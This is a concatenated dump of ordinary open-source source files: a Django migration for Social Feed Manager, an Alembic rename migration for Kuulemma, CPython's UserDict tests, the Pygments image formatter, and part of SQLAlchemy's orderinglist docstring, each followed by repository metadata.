field=models.DateTimeField(blank=True, help_text='If blank, will continue until stopped.', null=True),
),
migrations.AlterField(
model_name='collection',
name='harvest_type',
field=models.CharField(choices=[('twitter_user_timeline', 'Twitter user timeline'), ('twitter_search', 'Twitter search'), ('twitter_filter', 'Twitter filter'), ('twitter_sample', 'Twitter sample'), ('tumblr_blog_posts', 'Tumblr blog posts'), ('flickr_user', 'Flickr user'), ('weibo_timeline', 'Weibo timeline')], max_length=255),
),
migrations.AlterField(
model_name='collection',
name='link',
field=models.CharField(blank=True, max_length=512, verbose_name='Public link'),
),
migrations.AlterField(
model_name='collection',
name='name',
field=models.CharField(max_length=255, verbose_name='Collection name'),
),
migrations.AlterField(
model_name='collection',
name='schedule_minutes',
field=models.PositiveIntegerField(choices=[(1, 'One time harvest'), (30, 'Every 30 minutes'), (60, 'Every hour'), (240, 'Every 4 hours'), (720, 'Every 12 hours'), (1440, 'Every day'), (10080, 'Every week'), (40320, 'Every 4 weeks'), (5, 'Every 5 minutes')], default=10080, null=True, verbose_name='schedule'),
),
migrations.AlterField(
model_name='collection',
name='visibility',
field=models.CharField(choices=[('default', 'Group only'), ('local', 'All other users')], default='default', help_text='Who else can view and export from this collection. Select "All other users" to share with all Social Feed Manager users.', max_length=255),
),
migrations.AlterField(
model_name='collectionset',
name='name',
field=models.CharField(max_length=255, verbose_name='Collection set name'),
),
migrations.AlterField(
model_name='credential',
name='name',
field=models.CharField(max_length=255, verbose_name='Credential name'),
),
migrations.AlterField(
model_name='credential',
name='platform',
field=models.CharField(choices=[('twitter', 'Twitter'), ('flickr', 'Flickr'), ('weibo', 'Weibo'), ('tumblr', 'Tumblr')], help_text='Platform name', max_length=255),
),
migrations.AlterField(
model_name='export',
name='errors',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='export',
name='export_format',
field=models.CharField(choices=[('xlsx', 'Excel (XLSX)'), ('csv', 'Comma separated values (CSV)'), ('tsv', 'Tab separated values (TSV)'), ('json_full', 'Full JSON'), ('json', 'JSON of limited fields'), ('dehydrate', 'Text file of identifiers (dehydrate)')], default='xlsx', max_length=10),
),
migrations.AlterField(
model_name='export',
name='export_segment_size',
field=models.BigIntegerField(blank=True, choices=[(100000, '100,000'), (250000, '250,000'), (500000, '500,000'), (100000, '1,000,000'), (None, 'Single file'), (100, '100')], default=250000, null=True),
),
migrations.AlterField(
model_name='export',
name='infos',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='export',
name='status',
field=models.CharField(choices=[('not requested', 'Not requested'), ('requested', 'Requested'), ('running', 'Running'), ('completed success', 'Success'), ('completed failure', 'Failure')], default='not requested', max_length=20),
),
migrations.AlterField(
model_name='export',
name='warnings',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='harvest',
name='errors',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='harvest',
name='infos',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='harvest',
name='status',
field=models.CharField(choices=[('requested', 'Requested'), ('completed success', 'Success'), ('completed failure', 'Completed with errors'), ('running', 'Running'), ('stop requested', 'Stop requested'), ('stopping', 'Stopping'), ('voided', 'Voided'), ('skipped', 'Skipped'), ('paused', 'Paused')], default='requested', max_length=20),
),
migrations.AlterField(
model_name='harvest',
name='token_updates',
field=jsonfield.fields.JSONField(blank=True, default={}),
),
migrations.AlterField(
model_name='harvest',
name='uids',
field=jsonfield.fields.JSONField(blank=True, default={}),
),
migrations.AlterField(
model_name='harvest',
name='warnings',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='historicalcollection',
name='end_date',
field=models.DateTimeField(blank=True, help_text='If blank, will continue until stopped.', null=True),
),
migrations.AlterField(
model_name='historicalcollection',
name='harvest_type',
field=models.CharField(choices=[('twitter_user_timeline', 'Twitter user timeline'), ('twitter_search', 'Twitter search'), ('twitter_filter', 'Twitter filter'), ('twitter_sample', 'Twitter sample'), ('tumblr_blog_posts', 'Tumblr blog posts'), ('flickr_user', 'Flickr user'), ('weibo_timeline', 'Weibo timeline')], max_length=255),
),
migrations.AlterField(
model_name='historicalcollection',
name='link',
field=models.CharField(blank=True, max_length=512, verbose_name='Public link'),
),
migrations.AlterField(
model_name='historicalcollection',
name='name',
field=models.CharField(max_length=255, verbose_name='Collection name'),
),
migrations.AlterField(
model_name='historicalcollection',
name='schedule_minutes',
field=models.PositiveIntegerField(choices=[(1, 'One time harvest'), (30, 'Every 30 minutes'), (60, 'Every hour'), (240, 'Every 4 hours'), (720, 'Every 12 hours'), (1440, 'Every day'), (10080, 'Every week'), (40320, 'Every 4 weeks'), (5, 'Every 5 minutes')], default=10080, null=True, verbose_name='schedule'),
),
migrations.AlterField(
model_name='historicalcollection',
name='visibility',
field=models.CharField(choices=[('default', 'Group only'), ('local', 'All other users')], default='default', help_text='Who else can view and export from this collection. Select "All other users" to share with all Social Feed Manager users.', max_length=255),
),
migrations.AlterField(
model_name='historicalcollectionset',
name='name',
field=models.CharField(max_length=255, verbose_name='Collection set name'),
),
migrations.AlterField(
model_name='historicalcredential',
name='name',
field=models.CharField(max_length=255, verbose_name='Credential name'),
),
migrations.AlterField(
model_name='historicalcredential',
name='platform',
field=models.CharField(choices=[('twitter', 'Twitter'), ('flickr', 'Flickr'), ('weibo', 'Weibo'), ('tumblr', 'Tumblr')], help_text='Platform name', max_length=255),
),
migrations.AlterField(
model_name='user',
name='email_frequency',
field=models.CharField(choices=[('daily', 'Daily'), ('weekly', 'Weekly'), ('monthly', 'Monthly'), ('none', 'None')], default='daily', max_length=10),
),
migrations.AlterField(
model_name='user',
name='last_name',
field=models.CharField(blank=True, max_length=150, verbose_name='last name'),
),
migrations.AlterField(
model_name='user',
name='local_id',
field=models.CharField(blank=True, default='', help_text='Local identifier', max_length=255),
),
migrations.AlterField(
model_name='user',
name='username',
field=models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username'),
),
]
| mit | -1,442,115,788,846,151,700 | 49.039024 | 347 | 0.586177 | false |
City-of-Helsinki/kuulemma | kuulemma/migrations/versions/14051cff79e_rename_hearing_section_to_alternative.py | 2 | 4084 | # -*- coding: utf-8 -*-
# Kuulemma
# Copyright (C) 2014, Fast Monkeys Oy
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Rename `hearing_section` to `alternative`"""
# revision identifiers, used by Alembic.
revision = '14051cff79e'
down_revision = '51051f5b195'
from alembic import op
def upgrade():
op.rename_table('hearing_section', 'alternative')
op.rename_table('hearing_section_version', 'alternative_version')
op.alter_column(
'comment',
'hearing_section_id',
new_column_name='alternative_id'
)
op.alter_column(
'image',
'hearing_section_id',
new_column_name='alternative_id'
)
op.alter_column(
'comment_version',
'hearing_section_id',
new_column_name='alternative_id'
)
op.create_index(op.f(
'ix_alternative_version_end_transaction_id'),
'alternative_version',
['end_transaction_id'],
unique=False
)
op.create_index(op.f(
'ix_alternative_version_operation_type'),
'alternative_version',
['operation_type'],
unique=False
)
op.create_index(op.f(
'ix_alternative_version_transaction_id'),
'alternative_version',
['transaction_id'],
unique=False
)
op.drop_index(
'ix_hearing_section_version_end_transaction_id',
table_name='alternative_version'
)
op.drop_index(
'ix_hearing_section_version_operation_type',
table_name='alternative_version'
)
op.drop_index(
'ix_hearing_section_version_transaction_id',
table_name='alternative_version'
)
op.create_index(
op.f('ix_image_alternative_id'),
'image',
['alternative_id'],
unique=False
)
op.drop_index(
'ix_image_hearing_section_id',
table_name='image'
)
def downgrade():
op.drop_index(
op.f('ix_image_alternative_id'),
table_name='image'
)
op.drop_index(
op.f('ix_alternative_version_transaction_id'),
table_name='alternative_version'
)
op.drop_index(
op.f('ix_alternative_version_operation_type'),
table_name='alternative_version'
)
op.drop_index(
op.f('ix_alternative_version_end_transaction_id'),
table_name='alternative_version'
)
op.rename_table('alternative', 'hearing_section')
op.rename_table('alternative_version', 'hearing_section_version')
op.alter_column(
'comment',
'alternative_id',
new_column_name='hearing_section_id'
)
op.alter_column(
'image',
'alternative_id',
new_column_name='hearing_section_id'
)
op.alter_column(
'comment_version',
'alternative_id',
new_column_name='hearing_section_id'
)
op.create_index(
'ix_image_hearing_section_id',
'image',
['hearing_section_id'],
unique=False
)
op.create_index(
'ix_hearing_section_version_transaction_id',
'hearing_section_version',
['transaction_id'],
unique=False
)
op.create_index(
'ix_hearing_section_version_operation_type',
'hearing_section_version',
['operation_type'],
unique=False
)
op.create_index(
'ix_hearing_section_version_end_transaction_id',
'hearing_section_version',
['end_transaction_id'],
unique=False
)
| agpl-3.0 | -8,511,520,248,250,662,000 | 25.519481 | 77 | 0.613369 | false |
MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-3.0/Lib/test/test_userdict.py | 2 | 6470 | # Check every path through every method of UserDict
from test import support, mapping_tests
import collections
d0 = {}
d1 = {"one": 1}
d2 = {"one": 1, "two": 2}
d3 = {"one": 1, "two": 3, "three": 5}
d4 = {"one": None, "two": None}
d5 = {"one": 1, "two": 1}
class UserDictTest(mapping_tests.TestHashMappingProtocol):
type2test = collections.UserDict
def test_all(self):
# Test constructors
u = collections.UserDict()
u0 = collections.UserDict(d0)
u1 = collections.UserDict(d1)
u2 = collections.UserDict(d2)
uu = collections.UserDict(u)
uu0 = collections.UserDict(u0)
uu1 = collections.UserDict(u1)
uu2 = collections.UserDict(u2)
# keyword arg constructor
self.assertEqual(collections.UserDict(one=1, two=2), d2)
# item sequence constructor
self.assertEqual(collections.UserDict([('one',1), ('two',2)]), d2)
self.assertEqual(collections.UserDict(dict=[('one',1), ('two',2)]), d2)
# both together
self.assertEqual(collections.UserDict([('one',1), ('two',2)], two=3, three=5), d3)
# alternate constructor
self.assertEqual(collections.UserDict.fromkeys('one two'.split()), d4)
self.assertEqual(collections.UserDict().fromkeys('one two'.split()), d4)
self.assertEqual(collections.UserDict.fromkeys('one two'.split(), 1), d5)
self.assertEqual(collections.UserDict().fromkeys('one two'.split(), 1), d5)
self.assert_(u1.fromkeys('one two'.split()) is not u1)
self.assert_(isinstance(u1.fromkeys('one two'.split()), collections.UserDict))
self.assert_(isinstance(u2.fromkeys('one two'.split()), collections.UserDict))
# Test __repr__
self.assertEqual(str(u0), str(d0))
self.assertEqual(repr(u1), repr(d1))
self.assertEqual(repr(u2), repr(d2))
# Test __cmp__ and __len__
all = [d0, d1, d2, u, u0, u1, u2, uu, uu0, uu1, uu2]
for a in all:
for b in all:
self.assertEqual(a == b, len(a) == len(b))
# Test __getitem__
self.assertEqual(u2["one"], 1)
self.assertRaises(KeyError, u1.__getitem__, "two")
# Test __setitem__
u3 = collections.UserDict(u2)
u3["two"] = 2
u3["three"] = 3
# Test __delitem__
del u3["three"]
self.assertRaises(KeyError, u3.__delitem__, "three")
# Test clear
u3.clear()
self.assertEqual(u3, {})
# Test copy()
u2a = u2.copy()
self.assertEqual(u2a, u2)
u2b = collections.UserDict(x=42, y=23)
u2c = u2b.copy() # making a copy of a UserDict is special cased
self.assertEqual(u2b, u2c)
class MyUserDict(collections.UserDict):
def display(self): print(self)
m2 = MyUserDict(u2)
m2a = m2.copy()
self.assertEqual(m2a, m2)
# SF bug #476616 -- copy() of UserDict subclass shared data
m2['foo'] = 'bar'
self.assertNotEqual(m2a, m2)
# Test keys, items, values
self.assertEqual(u2.keys(), d2.keys())
self.assertEqual(u2.items(), d2.items())
self.assertEqual(list(u2.values()), list(d2.values()))
# Test "in".
for i in u2.keys():
self.assert_(i in u2)
self.assertEqual(i in u1, i in d1)
self.assertEqual(i in u0, i in d0)
# Test update
t = collections.UserDict()
t.update(u2)
self.assertEqual(t, u2)
# Test get
for i in u2.keys():
self.assertEqual(u2.get(i), u2[i])
self.assertEqual(u1.get(i), d1.get(i))
self.assertEqual(u0.get(i), d0.get(i))
# Test "in" iteration.
for i in range(20):
u2[i] = str(i)
ikeys = []
for k in u2:
ikeys.append(k)
keys = u2.keys()
self.assertEqual(set(ikeys), set(keys))
# Test setdefault
t = collections.UserDict()
self.assertEqual(t.setdefault("x", 42), 42)
self.assert_("x" in t)
self.assertEqual(t.setdefault("x", 23), 42)
# Test pop
t = collections.UserDict(x=42)
self.assertEqual(t.pop("x"), 42)
self.assertRaises(KeyError, t.pop, "x")
self.assertEqual(t.pop("x", 1), 1)
t["x"] = 42
self.assertEqual(t.pop("x", 1), 42)
# Test popitem
t = collections.UserDict(x=42)
self.assertEqual(t.popitem(), ("x", 42))
self.assertRaises(KeyError, t.popitem)
def test_missing(self):
# Make sure UserDict doesn't have a __missing__ method
self.assertEqual(hasattr(collections.UserDict, "__missing__"), False)
# Test several cases:
# (D) subclass defines __missing__ method returning a value
# (E) subclass defines __missing__ method raising RuntimeError
# (F) subclass sets __missing__ instance variable (no effect)
# (G) subclass doesn't define __missing__ at a all
class D(collections.UserDict):
def __missing__(self, key):
return 42
d = D({1: 2, 3: 4})
self.assertEqual(d[1], 2)
self.assertEqual(d[3], 4)
self.assert_(2 not in d)
self.assert_(2 not in d.keys())
self.assertEqual(d[2], 42)
class E(collections.UserDict):
def __missing__(self, key):
raise RuntimeError(key)
e = E()
try:
e[42]
except RuntimeError as err:
self.assertEqual(err.args, (42,))
else:
self.fail("e[42] didn't raise RuntimeError")
class F(collections.UserDict):
def __init__(self):
# An instance variable __missing__ should have no effect
self.__missing__ = lambda key: None
collections.UserDict.__init__(self)
f = F()
try:
f[42]
except KeyError as err:
self.assertEqual(err.args, (42,))
else:
self.fail("f[42] didn't raise KeyError")
class G(collections.UserDict):
pass
g = G()
try:
g[42]
except KeyError as err:
self.assertEqual(err.args, (42,))
else:
self.fail("g[42] didn't raise KeyError")
def test_main():
support.run_unittest(
UserDictTest,
)
if __name__ == "__main__":
test_main()
| mit | -4,867,743,210,431,964,000 | 31.676768 | 90 | 0.547759 | false |
PatKayongo/patkayongo.github.io | node_modules/pygmentize-bundled/vendor/pygments/build-3.3/pygments/formatters/img.py | 94 | 18053 | # -*- coding: utf-8 -*-
"""
pygments.formatters.img
~~~~~~~~~~~~~~~~~~~~~~~
Formatter for Pixmap output.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import sys
from pygments.formatter import Formatter
from pygments.util import get_bool_opt, get_int_opt, \
get_list_opt, get_choice_opt
# Import this carefully
try:
from PIL import Image, ImageDraw, ImageFont
pil_available = True
except ImportError:
pil_available = False
try:
import winreg
except ImportError:
_winreg = None
__all__ = ['ImageFormatter', 'GifImageFormatter', 'JpgImageFormatter',
'BmpImageFormatter']
# For some unknown reason every font calls it something different
STYLES = {
'NORMAL': ['', 'Roman', 'Book', 'Normal', 'Regular', 'Medium'],
'ITALIC': ['Oblique', 'Italic'],
'BOLD': ['Bold'],
'BOLDITALIC': ['Bold Oblique', 'Bold Italic'],
}
# A sane default for modern systems
DEFAULT_FONT_NAME_NIX = 'Bitstream Vera Sans Mono'
DEFAULT_FONT_NAME_WIN = 'Courier New'
class PilNotAvailable(ImportError):
"""When Python imaging library is not available"""
class FontNotFound(Exception):
"""When there are no usable fonts specified"""
class FontManager(object):
"""
Manages a set of fonts: normal, italic, bold, etc...
"""
def __init__(self, font_name, font_size=14):
self.font_name = font_name
self.font_size = font_size
self.fonts = {}
self.encoding = None
if sys.platform.startswith('win'):
if not font_name:
self.font_name = DEFAULT_FONT_NAME_WIN
self._create_win()
else:
if not font_name:
self.font_name = DEFAULT_FONT_NAME_NIX
self._create_nix()
def _get_nix_font_path(self, name, style):
from subprocess import getstatusoutput
exit, out = getstatusoutput('fc-list "%s:style=%s" file' %
(name, style))
if not exit:
lines = out.splitlines()
if lines:
path = lines[0].strip().strip(':')
return path
def _create_nix(self):
for name in STYLES['NORMAL']:
path = self._get_nix_font_path(self.font_name, name)
if path is not None:
self.fonts['NORMAL'] = ImageFont.truetype(path, self.font_size)
break
else:
raise FontNotFound('No usable fonts named: "%s"' %
self.font_name)
for style in ('ITALIC', 'BOLD', 'BOLDITALIC'):
for stylename in STYLES[style]:
path = self._get_nix_font_path(self.font_name, stylename)
if path is not None:
self.fonts[style] = ImageFont.truetype(path, self.font_size)
break
else:
if style == 'BOLDITALIC':
self.fonts[style] = self.fonts['BOLD']
else:
self.fonts[style] = self.fonts['NORMAL']
def _lookup_win(self, key, basename, styles, fail=False):
for suffix in ('', ' (TrueType)'):
for style in styles:
try:
valname = '%s%s%s' % (basename, style and ' '+style, suffix)
val, _ = winreg.QueryValueEx(key, valname)
return val
except EnvironmentError:
continue
else:
if fail:
raise FontNotFound('Font %s (%s) not found in registry' %
(basename, styles[0]))
return None
def _create_win(self):
try:
key = winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
r'Software\Microsoft\Windows NT\CurrentVersion\Fonts')
except EnvironmentError:
try:
key = winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
r'Software\Microsoft\Windows\CurrentVersion\Fonts')
except EnvironmentError:
raise FontNotFound('Can\'t open Windows font registry key')
try:
path = self._lookup_win(key, self.font_name, STYLES['NORMAL'], True)
self.fonts['NORMAL'] = ImageFont.truetype(path, self.font_size)
for style in ('ITALIC', 'BOLD', 'BOLDITALIC'):
path = self._lookup_win(key, self.font_name, STYLES[style])
if path:
self.fonts[style] = ImageFont.truetype(path, self.font_size)
else:
if style == 'BOLDITALIC':
self.fonts[style] = self.fonts['BOLD']
else:
self.fonts[style] = self.fonts['NORMAL']
finally:
winreg.CloseKey(key)
def get_char_size(self):
"""
Get the character size.
"""
return self.fonts['NORMAL'].getsize('M')
def get_font(self, bold, oblique):
"""
Get the font based on bold and italic flags.
"""
if bold and oblique:
return self.fonts['BOLDITALIC']
elif bold:
return self.fonts['BOLD']
elif oblique:
return self.fonts['ITALIC']
else:
return self.fonts['NORMAL']
class ImageFormatter(Formatter):
"""
Create a PNG image from source code. This uses the Python Imaging Library to
generate a pixmap from the source code.
*New in Pygments 0.10.*
Additional options accepted:
`image_format`
An image format to output to that is recognised by PIL, these include:
* "PNG" (default)
* "JPEG"
* "BMP"
* "GIF"
`line_pad`
The extra spacing (in pixels) between each line of text.
Default: 2
`font_name`
The font name to be used as the base font from which others, such as
bold and italic fonts will be generated. This really should be a
monospace font to look sane.
Default: "Bitstream Vera Sans Mono"
`font_size`
The font size in points to be used.
Default: 14
`image_pad`
The padding, in pixels to be used at each edge of the resulting image.
Default: 10
`line_numbers`
Whether line numbers should be shown: True/False
Default: True
`line_number_start`
The line number of the first line.
Default: 1
`line_number_step`
The step used when printing line numbers.
Default: 1
`line_number_bg`
The background colour (in "#123456" format) of the line number bar, or
None to use the style background color.
Default: "#eed"
`line_number_fg`
The text color of the line numbers (in "#123456"-like format).
Default: "#886"
`line_number_chars`
The number of columns of line numbers allowable in the line number
margin.
Default: 2
`line_number_bold`
Whether line numbers will be bold: True/False
Default: False
`line_number_italic`
Whether line numbers will be italicized: True/False
Default: False
`line_number_separator`
Whether a line will be drawn between the line number area and the
source code area: True/False
Default: True
`line_number_pad`
The horizontal padding (in pixels) between the line number margin, and
the source code area.
Default: 6
`hl_lines`
Specify a list of lines to be highlighted. *New in Pygments 1.2.*
Default: empty list
`hl_color`
Specify the color for highlighting lines. *New in Pygments 1.2.*
Default: highlight color of the selected style
"""
# Required by the pygments mapper
name = 'img'
aliases = ['img', 'IMG', 'png']
filenames = ['*.png']
unicodeoutput = False
default_image_format = 'png'
def __init__(self, **options):
"""
See the class docstring for explanation of options.
"""
if not pil_available:
raise PilNotAvailable(
'Python Imaging Library is required for this formatter')
Formatter.__init__(self, **options)
# Read the style
self.styles = dict(self.style)
if self.style.background_color is None:
self.background_color = '#fff'
else:
self.background_color = self.style.background_color
# Image options
self.image_format = get_choice_opt(
options, 'image_format', ['png', 'jpeg', 'gif', 'bmp'],
self.default_image_format, normcase=True)
self.image_pad = get_int_opt(options, 'image_pad', 10)
self.line_pad = get_int_opt(options, 'line_pad', 2)
# The fonts
fontsize = get_int_opt(options, 'font_size', 14)
self.fonts = FontManager(options.get('font_name', ''), fontsize)
self.fontw, self.fonth = self.fonts.get_char_size()
# Line number options
self.line_number_fg = options.get('line_number_fg', '#886')
self.line_number_bg = options.get('line_number_bg', '#eed')
self.line_number_chars = get_int_opt(options,
'line_number_chars', 2)
self.line_number_bold = get_bool_opt(options,
'line_number_bold', False)
self.line_number_italic = get_bool_opt(options,
'line_number_italic', False)
self.line_number_pad = get_int_opt(options, 'line_number_pad', 6)
self.line_numbers = get_bool_opt(options, 'line_numbers', True)
self.line_number_separator = get_bool_opt(options,
'line_number_separator', True)
self.line_number_step = get_int_opt(options, 'line_number_step', 1)
self.line_number_start = get_int_opt(options, 'line_number_start', 1)
if self.line_numbers:
self.line_number_width = (self.fontw * self.line_number_chars +
self.line_number_pad * 2)
else:
self.line_number_width = 0
self.hl_lines = []
hl_lines_str = get_list_opt(options, 'hl_lines', [])
for line in hl_lines_str:
try:
self.hl_lines.append(int(line))
except ValueError:
pass
self.hl_color = options.get('hl_color',
self.style.highlight_color) or '#f90'
self.drawables = []
def get_style_defs(self, arg=''):
raise NotImplementedError('The -S option is meaningless for the image '
'formatter. Use -O style=<stylename> instead.')
def _get_line_height(self):
"""
Get the height of a line.
"""
return self.fonth + self.line_pad
def _get_line_y(self, lineno):
"""
Get the Y coordinate of a line number.
"""
return lineno * self._get_line_height() + self.image_pad
def _get_char_width(self):
"""
Get the width of a character.
"""
return self.fontw
def _get_char_x(self, charno):
"""
Get the X coordinate of a character position.
"""
return charno * self.fontw + self.image_pad + self.line_number_width
def _get_text_pos(self, charno, lineno):
"""
Get the actual position for a character and line position.
"""
return self._get_char_x(charno), self._get_line_y(lineno)
def _get_linenumber_pos(self, lineno):
"""
Get the actual position for the start of a line number.
"""
return (self.image_pad, self._get_line_y(lineno))
def _get_text_color(self, style):
"""
Get the correct color for the token from the style.
"""
if style['color'] is not None:
fill = '#' + style['color']
else:
fill = '#000'
return fill
def _get_style_font(self, style):
"""
Get the correct font for the style.
"""
return self.fonts.get_font(style['bold'], style['italic'])
def _get_image_size(self, maxcharno, maxlineno):
"""
Get the required image size.
"""
return (self._get_char_x(maxcharno) + self.image_pad,
self._get_line_y(maxlineno + 0) + self.image_pad)
def _draw_linenumber(self, posno, lineno):
"""
Remember a line number drawable to paint later.
"""
self._draw_text(
self._get_linenumber_pos(posno),
str(lineno).rjust(self.line_number_chars),
font=self.fonts.get_font(self.line_number_bold,
self.line_number_italic),
fill=self.line_number_fg,
)
def _draw_text(self, pos, text, font, **kw):
"""
Remember a single drawable tuple to paint later.
"""
self.drawables.append((pos, text, font, kw))
def _create_drawables(self, tokensource):
"""
Create drawables for the token content.
"""
lineno = charno = maxcharno = 0
for ttype, value in tokensource:
while ttype not in self.styles:
ttype = ttype.parent
style = self.styles[ttype]
# TODO: make sure tab expansion happens earlier in the chain. It
# really ought to be done on the input, as to do it right here is
# quite complex.
value = value.expandtabs(4)
lines = value.splitlines(True)
#print lines
for i, line in enumerate(lines):
temp = line.rstrip('\n')
if temp:
self._draw_text(
self._get_text_pos(charno, lineno),
temp,
font = self._get_style_font(style),
fill = self._get_text_color(style)
)
charno += len(temp)
maxcharno = max(maxcharno, charno)
if line.endswith('\n'):
# add a line for each extra line in the value
charno = 0
lineno += 1
self.maxcharno = maxcharno
self.maxlineno = lineno
def _draw_line_numbers(self):
"""
Create drawables for the line numbers.
"""
if not self.line_numbers:
return
for p in range(self.maxlineno):
n = p + self.line_number_start
if (n % self.line_number_step) == 0:
self._draw_linenumber(p, n)
def _paint_line_number_bg(self, im):
"""
Paint the line number background on the image.
"""
if not self.line_numbers:
return
if self.line_number_fg is None:
return
draw = ImageDraw.Draw(im)
recth = im.size[-1]
rectw = self.image_pad + self.line_number_width - self.line_number_pad
draw.rectangle([(0, 0),
(rectw, recth)],
fill=self.line_number_bg)
draw.line([(rectw, 0), (rectw, recth)], fill=self.line_number_fg)
del draw
def format(self, tokensource, outfile):
"""
Format ``tokensource``, an iterable of ``(tokentype, tokenstring)``
tuples and write it into ``outfile``.
This implementation calculates where it should draw each token on the
pixmap, then calculates the required pixmap size and draws the items.
"""
self._create_drawables(tokensource)
self._draw_line_numbers()
im = Image.new(
'RGB',
self._get_image_size(self.maxcharno, self.maxlineno),
self.background_color
)
self._paint_line_number_bg(im)
draw = ImageDraw.Draw(im)
# Highlight
if self.hl_lines:
x = self.image_pad + self.line_number_width - self.line_number_pad + 1
recth = self._get_line_height()
rectw = im.size[0] - x
for linenumber in self.hl_lines:
y = self._get_line_y(linenumber - 1)
draw.rectangle([(x, y), (x + rectw, y + recth)],
fill=self.hl_color)
for pos, value, font, kw in self.drawables:
draw.text(pos, value, font=font, **kw)
im.save(outfile, self.image_format.upper())
# Add one formatter per format, so that the "-f gif" option gives the correct result
# when used in pygmentize.
class GifImageFormatter(ImageFormatter):
"""
Create a GIF image from source code. This uses the Python Imaging Library to
generate a pixmap from the source code.
*New in Pygments 1.0.* (You could create GIF images before by passing a
suitable `image_format` option to the `ImageFormatter`.)
"""
name = 'img_gif'
aliases = ['gif']
filenames = ['*.gif']
default_image_format = 'gif'
class JpgImageFormatter(ImageFormatter):
"""
Create a JPEG image from source code. This uses the Python Imaging Library to
generate a pixmap from the source code.
*New in Pygments 1.0.* (You could create JPEG images before by passing a
suitable `image_format` option to the `ImageFormatter`.)
"""
name = 'img_jpg'
aliases = ['jpg', 'jpeg']
filenames = ['*.jpg']
default_image_format = 'jpeg'
class BmpImageFormatter(ImageFormatter):
"""
Create a bitmap image from source code. This uses the Python Imaging Library to
generate a pixmap from the source code.
*New in Pygments 1.0.* (You could create bitmap images before by passing a
suitable `image_format` option to the `ImageFormatter`.)
"""
name = 'img_bmp'
aliases = ['bmp', 'bitmap']
filenames = ['*.bmp']
default_image_format = 'bmp'
| mit | -523,872,509,259,411,200 | 31.64557 | 84 | 0.551321 | false |
sqlalchemy/sqlalchemy | lib/sqlalchemy/ext/orderinglist.py | 3 | 13875 | # ext/orderinglist.py
# Copyright (C) 2005-2021 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: https://www.opensource.org/licenses/mit-license.php
"""A custom list that manages index/position information for contained
elements.
:author: Jason Kirtland
``orderinglist`` is a helper for mutable ordered relationships. It will
intercept list operations performed on a :func:`_orm.relationship`-managed
collection and
automatically synchronize changes in list position onto a target scalar
attribute.
Example: A ``slide`` table, where each row refers to zero or more entries
in a related ``bullet`` table. The bullets within a slide are
displayed in order based on the value of the ``position`` column in the
``bullet`` table. As entries are reordered in memory, the value of the
``position`` attribute should be updated to reflect the new sort order::
Base = declarative_base()
class Slide(Base):
__tablename__ = 'slide'
id = Column(Integer, primary_key=True)
name = Column(String)
bullets = relationship("Bullet", order_by="Bullet.position")
class Bullet(Base):
__tablename__ = 'bullet'
id = Column(Integer, primary_key=True)
slide_id = Column(Integer, ForeignKey('slide.id'))
position = Column(Integer)
text = Column(String)
The standard relationship mapping will produce a list-like attribute on each
``Slide`` containing all related ``Bullet`` objects,
but coping with changes in ordering is not handled automatically.
When appending a ``Bullet`` into ``Slide.bullets``, the ``Bullet.position``
attribute will remain unset until manually assigned. When the ``Bullet``
is inserted into the middle of the list, the following ``Bullet`` objects
will also need to be renumbered.
The :class:`.OrderingList` object automates this task, managing the
``position`` attribute on all ``Bullet`` objects in the collection. It is
constructed using the :func:`.ordering_list` factory::
from sqlalchemy.ext.orderinglist import ordering_list
Base = declarative_base()
class Slide(Base):
__tablename__ = 'slide'
id = Column(Integer, primary_key=True)
name = Column(String)
bullets = relationship("Bullet", order_by="Bullet.position",
collection_class=ordering_list('position'))
class Bullet(Base):
__tablename__ = 'bullet'
id = Column(Integer, primary_key=True)
slide_id = Column(Integer, ForeignKey('slide.id'))
position = Column(Integer)
text = Column(String)
With the above mapping the ``Bullet.position`` attribute is managed::
s = Slide()
s.bullets.append(Bullet())
s.bullets.append(Bullet())
s.bullets[1].position
>>> 1
s.bullets.insert(1, Bullet())
s.bullets[2].position
>>> 2
The :class:`.OrderingList` construct only works with **changes** to a
collection, and not the initial load from the database, and requires that the
list be sorted when loaded. Therefore, be sure to specify ``order_by`` on the
:func:`_orm.relationship` against the target ordering attribute, so that the
ordering is correct when first loaded.
.. warning::
:class:`.OrderingList` only provides limited functionality when a primary
key column or unique column is the target of the sort. Operations
that are unsupported or are problematic include:
* two entries must trade values. This is not supported directly in the
case of a primary key or unique constraint because it means at least
one row would need to be temporarily removed first, or changed to
a third, neutral value while the switch occurs.
* an entry must be deleted in order to make room for a new entry.
SQLAlchemy's unit of work performs all INSERTs before DELETEs within a
single flush. In the case of a primary key, it will trade
an INSERT/DELETE of the same primary key for an UPDATE statement in order
to lessen the impact of this limitation, however this does not take place
for a UNIQUE column.
A future feature will allow the "DELETE before INSERT" behavior to be
possible, alleviating this limitation, though this feature will require
explicit configuration at the mapper level for sets of columns that
are to be handled in this way.
:func:`.ordering_list` takes the name of the related object's ordering
attribute as an argument. By default, the zero-based integer index of the
object's position in the :func:`.ordering_list` is synchronized with the
ordering attribute: index 0 will get position 0, index 1 position 1, etc. To
start numbering at 1 or some other integer, provide ``count_from=1``.
"""
